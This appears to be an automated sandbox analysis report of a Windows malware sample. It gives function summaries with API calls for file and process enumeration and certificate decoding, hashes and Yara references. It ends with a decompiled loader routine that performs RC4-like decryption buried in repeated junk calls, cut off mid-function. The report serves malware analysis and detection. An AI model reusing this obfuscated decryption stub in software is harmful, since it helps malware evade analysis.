_EH_prolog.MSVCRT ref: 0041BCF5
#800.MFC42 ref: 0041BD11
#800.MFC42 ref: 0041BD1D
#800.MFC42 ref: 0041BD29

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$H_prolog
String ID:
API String ID: 948933410-0
Opcode ID: 4435ecd560b45f1ccd59ff5283d569ef5a4faf375f1702483c1d36aadaacfda6
Instruction ID: e09c032e86092017cdc6976c655b44b4ba5f8b562d29eb600d9bc1448d599cc0
Opcode Fuzzy Hash: 4435ecd560b45f1ccd59ff5283d569ef5a4faf375f1702483c1d36aadaacfda6
Instruction Fuzzy Hash: B2F0A0B0A146609BC324EF48E1057DDB7F4AF04308F80C84FD45263251DBF86A08C755

Uniqueness

Uniqueness Score: -1.00%

Function 0040E457, Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040E45C
#609.MFC42 ref: 0040E47B
#656.MFC42 ref: 0040E48A
#784.MFC42 ref: 0040E495

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #609#656#784H_prolog
String ID:
API String ID: 3012625883-0
Opcode ID: 0ac3d6cae47286ba99be804dac153778baa0701ad1a09eb637d04917ba212c44
Instruction ID: c316f80fd35cf00be96ececb392aed7bc85cb27fa82fc85d950830cf825a6da0
Opcode Fuzzy Hash: 0ac3d6cae47286ba99be804dac153778baa0701ad1a09eb637d04917ba212c44
Instruction Fuzzy Hash: 7AE06DB0A11660DBC714EF54E5017DDBBB4BF04318F91428FE066932C2CBB81A04CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E147, Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040E14C
#800.MFC42 ref: 0040E165
#656.MFC42 ref: 0040E171
#641.MFC42 ref: 0040E17C

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #641#656#800H_prolog
String ID:
API String ID: 2213181565-0
Opcode ID: bf29c70bf3cd6272398e68785172102297e033305ee7671105049e83c8513938
Instruction ID: 28572771a5bc15e78d5540cebd24e5cf4414ebd6719155a124ec2ac63a43aeba
Opcode Fuzzy Hash: bf29c70bf3cd6272398e68785172102297e033305ee7671105049e83c8513938
Instruction Fuzzy Hash: 5FE06571A14624DBC718EBA5E4123DDBAA4AF04318F40828EA062A3282CFB81A04CA95

Uniqueness

Uniqueness Score: -1.00%

Function 00401361, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(CWUCliFr.dll), ref: 0040CB1B
FreeLibrary.KERNEL32(00000000), ref: 0040CB26

Strings

CWUCliFr.dll, xrefs: 0040CB16

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$FreeLoad
String ID: CWUCliFr.dll
API String ID: 534179979-2492026163
Opcode ID: e4a1bb750b23d573716a300471e8225639c7bbc0398fb7e64eec2067eb21041c
Instruction ID: beec5b583bfb1f5615f2ebbe713a08467ea77c348ce9e3b537d55a80308b79b4
Opcode Fuzzy Hash: e4a1bb750b23d573716a300471e8225639c7bbc0398fb7e64eec2067eb21041c
Instruction Fuzzy Hash: 35E0D831300201DFD700DF68A989B5B77F9AFC8740724C87AF046D7190CAB498439BB8

Uniqueness

Uniqueness Score: -1.00%

Function 0040151E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

#341.MFC42 ref: 0041C133

Strings

@B, xrefs: 0041C13A
(B, xrefs: 0041C146

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #341
String ID: (B$@B
API String ID: 1595570120-3588368011
Opcode ID: ec75e1b5eeea7bd8747c664ab3925887fe3f167e07c4d82fb61ab10ee97e7b9e
Instruction ID: 9fc1a04d2e7c2c164a25ed8585c9de045f54167cbef22b7674d19ad04664b7df
Opcode Fuzzy Hash: ec75e1b5eeea7bd8747c664ab3925887fe3f167e07c4d82fb61ab10ee97e7b9e
Instruction Fuzzy Hash: 9EE045B1611B208F83A0DF2AA581642BAE0BF087103905E2F948BD3E11E774B4458F48

Uniqueness

Uniqueness Score: -1.00%

Function 00401519, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(CWUCliFr.dll), ref: 0040CB43
FreeLibrary.KERNEL32(00000000), ref: 0040CB4E

Strings

CWUCliFr.dll, xrefs: 0040CB3E

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$FreeLoad
String ID: CWUCliFr.dll
API String ID: 534179979-2492026163
Opcode ID: f9bea487d67abad07a8603035380da5a5723ae06376e88bc064a27ec8db6fd80
Instruction ID: 2cf9ca0c468eac24318c7e19693b037b9fd6ce6e338a0f81386bb0908aaa771b
Opcode Fuzzy Hash: f9bea487d67abad07a8603035380da5a5723ae06376e88bc064a27ec8db6fd80
Instruction Fuzzy Hash: 37C08C7039120092EA002BB03D4EB0233246790742F1004B2B206E10C0CAB8D000A168

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Windows.System.Profile.RetailInfo.exe PID: 4864 Parent PID: 6372 Windows.System.Profile.RetailInfo.exeCOMMON

Executed Functions

Function 00781D73, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 181encryptionCOMMON

Download Yara Rule

APIs

CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00008000,00000000,?,?), ref: 00781E21

Part of subcall function 00782E59: RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00782E8C

Strings

vaJP, xrefs: 00781E70
vaJP, xrefs: 00781F81
vaJP, xrefs: 00781FAA
vaJP, xrefs: 00781F1A
vaJP, xrefs: 00781DDC
vaJP, xrefs: 00781EC4
vaJP, xrefs: 00781F4A

Memory Dump Source

Source File: 0000000A.00000002.511924593.0000000000781000.00000020.00000001.sdmp, Offset: 00781000, based on PE: false

Yara matches

Similarity

API ID: CryptDecodeFreeHeapObject
String ID: vaJP$vaJP$vaJP$vaJP$vaJP$vaJP$vaJP
API String ID: 3639776415-3064939511
Opcode ID: 461c7e81b274cb8dae199a4a94b934addc43cdb2b2d934c73c25ed302cb6cc6e
Instruction ID: dc827c38e7d86eb99001cc023ded620a6c23e323d6a17276784fd4681b04690c
Opcode Fuzzy Hash: 461c7e81b274cb8dae199a4a94b934addc43cdb2b2d934c73c25ed302cb6cc6e
Instruction Fuzzy Hash: 27518E76FC0114A7D73472684C08EB969BE8F84710BE1815ABE15AB286CE3ECD4357E6

Uniqueness

Uniqueness Score: -1.00%

Function 007828A3, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,?,?,?), ref: 00782923
FindNextFileW.KERNELBASE(?,?,?,?), ref: 00782A5A

Part of subcall function 00782E59: RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00782E8C

FindClose.KERNELBASE(?,?,?), ref: 00782A95

Strings

I);-, xrefs: 00782A33
I);-, xrefs: 007828E7

Memory Dump Source

Source File: 0000000A.00000002.511924593.0000000000781000.00000020.00000001.sdmp, Offset: 00781000, based on PE: false

Yara matches

Similarity

API ID: Find$File$CloseFirstFreeHeapNext
String ID: I);-$I);-
API String ID: 1727660349-4294668190
Opcode ID: ef118ed1d6ce2a6494c541063eb25054c675b0a28c0fb724e2f562876884aafd
Instruction ID: 31d148c41439afaf9de69d77ea3a8a1ae7c3eb5a12abb50b311b0f918f37fe6a
Opcode Fuzzy Hash: ef118ed1d6ce2a6494c541063eb25054c675b0a28c0fb724e2f562876884aafd
Instruction Fuzzy Hash: 6B413D306C4208ABEF3476E48C49ABF2669DB80322F10815AF915E72D3DD7D8EC39756

Uniqueness

Uniqueness Score: -1.00%

Function 00783501, Relevance: 4.6, APIs: 3, Instructions: 81processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00783570
Process32FirstW.KERNEL32(00000000,?), ref: 007835AB
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00783611

Memory Dump Source

Source File: 0000000A.00000002.511924593.0000000000781000.00000020.00000001.sdmp, Offset: 00781000, based on PE: false

Yara matches

Similarity

API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32
String ID:
API String ID: 692674288-0
Opcode ID: eb19417a3ccc51a23e5d088a7d45b1b5c5470c1b3da0af9220738cbc00815bc1
Instruction ID: c6758ff29551f8c3551a35c422f478d9e5de516d72203e150a2eaba3243dd27a
Opcode Fuzzy Hash: eb19417a3ccc51a23e5d088a7d45b1b5c5470c1b3da0af9220738cbc00815bc1
Instruction Fuzzy Hash: E9216A217D011463DA30707C9D89AAE525A8B80B10F604517B525EB3C4EA3DDF9647B7

Uniqueness

Uniqueness Score: -1.00%

Function 0040133E, Relevance: 1901.2, APIs: 813, Strings: 271, Instructions: 4157
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040133E(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				signed int* _t69;
				char _t70;
				signed int _t75;
				signed int _t78;
				signed int* _t902;
				signed char _t905;
				char* _t909;
				char _t915;
				signed int _t927;
				signed char _t928;
				signed int _t930;
				signed int _t934;
				signed int _t939;
				long long* _t944;
				long long* _t946;
				long long* _t947;
				long long* _t948;
				long long* _t949;
				long long* _t950;
				long long* _t951;
				long long* _t952;
				long long* _t953;
				long long* _t954;
				long long* _t955;
				long long* _t956;
				long long* _t957;
				long long* _t958;
				long long* _t959;
				long long* _t960;
				long long* _t961;
				long long* _t962;
				long long* _t963;
				long long* _t964;
				long long* _t965;
				long long* _t966;
				long long* _t967;
				long long* _t968;
				long long* _t969;
				long long* _t970;
				long long* _t971;
				long long* _t972;
				long long* _t973;
				long long* _t974;
				long long* _t975;
				long long* _t976;
				long long* _t977;
				long long* _t978;
				long long* _t979;
				long long* _t980;
				long long* _t981;
				long long* _t982;
				long long* _t983;
				long long* _t984;
				long long* _t985;
				long long* _t986;
				long long* _t987;
				long long* _t988;
				long long* _t989;
				long long* _t990;
				long long* _t991;
				long long* _t992;
				long long* _t993;
				long long* _t994;
				long long* _t995;
				long long* _t996;
				long long* _t997;
				long long* _t998;
				long long* _t999;
				long long* _t1000;
				long long* _t1001;
				long long* _t1002;
				long long* _t1003;
				long long* _t1004;
				long long* _t1005;
				long long* _t1006;
				long long* _t1007;
				long long* _t1008;
				long long* _t1009;
				long long* _t1010;
				long long* _t1011;
				long long* _t1012;
				long long* _t1013;
				long long* _t1014;
				long long* _t1015;
				long long* _t1016;
				long long* _t1017;
				long long* _t1018;
				long long* _t1019;
				long long* _t1020;
				long long* _t1021;
				long long* _t1022;
				long long* _t1023;
				long long* _t1024;
				long long* _t1025;
				long long* _t1026;
				long long* _t1027;
				long long* _t1028;
				long long* _t1029;
				long long* _t1030;
				long long* _t1031;
				long long* _t1032;
				long long* _t1033;
				long long* _t1034;
				long long* _t1035;
				long long* _t1036;
				long long* _t1037;
				long long* _t1038;
				long long* _t1039;
				long long* _t1040;
				long long* _t1041;
				long long* _t1042;
				long long* _t1043;
				long long* _t1044;
				long long* _t1045;
				long long* _t1046;
				long long* _t1047;
				long long* _t1048;
				long long* _t1049;
				long long* _t1050;
				long long* _t1051;
				long long* _t1052;
				long long* _t1053;
				long long* _t1054;
				long long* _t1055;
				long long* _t1056;
				long long* _t1057;
				long long* _t1058;
				long long* _t1059;
				long long* _t1060;
				long long* _t1061;
				long long* _t1062;
				long long* _t1063;
				long long* _t1064;
				long long* _t1065;
				long long* _t1066;
				long long* _t1067;
				long long* _t1068;
				long long* _t1069;
				long long* _t1070;
				long long* _t1071;
				long long* _t1072;
				long long* _t1073;
				long long* _t1074;
				long long* _t1075;
				long long* _t1076;
				long long* _t1077;
				long long* _t1078;
				long long* _t1079;
				long long* _t1080;
				long long* _t1081;
				long long* _t1082;
				long long* _t1083;
				long long* _t1084;
				long long* _t1085;
				long long* _t1086;
				long long* _t1087;
				long long* _t1088;
				long long* _t1089;
				long long* _t1090;
				long long* _t1091;
				long long* _t1092;
				long long* _t1093;
				long long* _t1094;
				long long* _t1095;
				long long* _t1096;
				long long* _t1097;
				long long* _t1098;
				long long* _t1099;
				long long* _t1100;
				long long* _t1101;
				long long* _t1102;
				long long* _t1103;
				long long* _t1104;
				long long* _t1105;
				long long* _t1106;
				long long* _t1107;
				long long* _t1108;
				long long* _t1109;
				long long* _t1110;
				long long* _t1111;
				long long* _t1112;
				long long* _t1113;
				long long* _t1114;
				long long* _t1115;
				long long* _t1116;
				long long* _t1117;
				long long* _t1118;
				long long* _t1119;
				long long* _t1120;
				long long* _t1121;
				long long* _t1122;
				long long* _t1123;
				long long* _t1124;
				long long* _t1125;
				long long* _t1126;
				long long* _t1127;
				long long* _t1128;
				long long* _t1129;
				long long* _t1130;
				long long* _t1131;
				long long* _t1132;
				long long* _t1133;
				long long* _t1134;
				long long* _t1135;
				long long* _t1136;
				long long* _t1137;
				long long* _t1138;
				long long* _t1139;
				long long* _t1140;
				long long* _t1141;
				long long* _t1142;
				long long* _t1143;
				long long* _t1144;
				long long* _t1145;
				long long* _t1146;
				long long* _t1147;
				long long* _t1148;
				long long* _t1149;
				long long* _t1150;
				long long* _t1151;
				long long* _t1152;
				long long* _t1153;
				long long* _t1154;
				long long* _t1155;
				long long* _t1156;
				long long* _t1157;
				long long* _t1158;
				long long* _t1159;
				long long* _t1160;
				long long* _t1161;
				long long* _t1162;
				long long* _t1163;
				long long* _t1164;
				long long* _t1165;
				long long* _t1166;
				long long* _t1167;
				long long* _t1168;
				long long* _t1169;
				long long* _t1170;
				long long* _t1171;
				long long* _t1172;
				long long* _t1173;
				long long* _t1174;
				long long* _t1175;
				long long* _t1176;
				long long* _t1177;
				long long* _t1178;
				long long* _t1179;
				long long* _t1180;
				long long* _t1181;
				long long* _t1182;
				long long* _t1183;
				long long* _t1184;
				long long* _t1185;
				long long* _t1186;
				long long* _t1187;
				long long* _t1188;
				long long* _t1189;
				long long* _t1190;
				long long* _t1191;
				long long* _t1192;
				long long* _t1193;
				long long* _t1194;
				long long* _t1195;
				long long* _t1196;
				long long* _t1197;
				long long* _t1198;
				long long* _t1199;
				long long* _t1200;
				long long* _t1201;
				long long* _t1202;
				long long* _t1203;
				long long* _t1204;
				long long* _t1205;
				long long* _t1206;
				long long* _t1207;
				long long* _t1208;
				long long* _t1209;
				long long* _t1210;
				long long* _t1211;
				long long* _t1212;
				long long* _t1213;
				long long* _t1214;
				long long* _t1215;

				E004269B0(0x127c0, __ecx);
				if( *((intOrPtr*)(_t944 + 0x127d4)) <= 0) {
					_t69 = 0;
				} else {
					_t70 = 0;
					do {
						 *((char*)(_t944 + _t70 + 0x18)) = _t70;
						_t70 = _t70 + 1;
					} while (_t70 < 0x127aa);
					_t939 = 0;
					_t934 = 0;
					do {
						_t905 =  *((intOrPtr*)(_t944 + _t934 + 0x24));
						_t909 = _t944 + _t934 + 0x24;
						_t75 = (_t905 & 0x000000ff) + _t939 + ( *(_t934 %  *(_t944 + 0x127d8) +  *((intOrPtr*)(_t944 + 0x127d4))) & 0x000000ff);
						_t934 = _t934 + 1;
						_t939 = _t75 % 0x127aa;
						 *_t909 =  *(_t944 + _t939 + 0x24);
						 *(_t944 + _t939 + 0x24) = _t905;
					} while (_t934 < 0x127aa);
					_t78 = 0;
					 *(_t944 + 0x18) = 0;
					 *(_t944 + 0x20) =  *(_t944 + 0x127dc);
					 *((intOrPtr*)(_t944 + 0x1c)) =  *((intOrPtr*)(_t944 + 0x127e0)) - 1 + 1;
					while(1) {
						_t927 = (_t78 + 1) % 0x127aa;
						 *(_t944 + 0x14) = _t927;
						_t928 =  *((intOrPtr*)(_t944 + _t927 + 0x24));
						 *(_t944 + 0x13) = _t928;
						_t930 = ((_t928 & 0x000000ff) +  *(_t944 + 0x18)) % 0x127aa;
						 *(_t944 + 0x18) = _t930;
						 *(_t944 +  *(_t944 + 0x14) + 0x24) =  *((intOrPtr*)(_t944 + _t930 + 0x24));
						_t915 =  *(_t944 + 0x13);
						_push(0x127aa);
						_push(0x127aa);
						 *((char*)(_t944 + _t930 + 0x24)) = _t915;
						 *_t944 =  *0x42c148;
						printf("Result is:\nalpha=%f"); // executed
						_t946 = _t944 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0); // executed
						_push(_t915);
						_push(_t915);
						 *_t946 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t947 = _t946 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0); // executed
						_push(_t915);
						_push(_t915);
						 *_t947 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t948 = _t947 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t948 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t949 = _t948 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t949 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t950 = _t949 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t950 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t951 = _t950 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t951 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t952 = _t951 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t952 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t953 = _t952 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t953 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t954 = _t953 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t954 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t955 = _t954 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t955 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t956 = _t955 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t956 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t957 = _t956 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t957 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t958 = _t957 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t958 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t959 = _t958 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t959 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t960 = _t959 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t960 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t961 = _t960 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t961 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t962 = _t961 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t962 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t963 = _t962 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t963 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t964 = _t963 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t964 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t965 = _t964 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t965 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t966 = _t965 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t966 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t967 = _t966 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t967 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t968 = _t967 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t968 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t969 = _t968 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t969 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t970 = _t969 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t970 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t971 = _t970 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t971 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t972 = _t971 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t972 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t973 = _t972 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t973 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t974 = _t973 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t974 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t975 = _t974 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t975 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t976 = _t975 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t976 =  *0x42c148;
						printf("Result is:\nalpha=%f");
						_t977 = _t976 + 0xc;
						SendMessageA(0, 0x2240, 0, 0);
						ShowWindow(0, 0);
						_push(_t915);
						_push(_t915);
						 *_t977 =  *0x42c148;
						printf("Result is:\nalpha=%f");
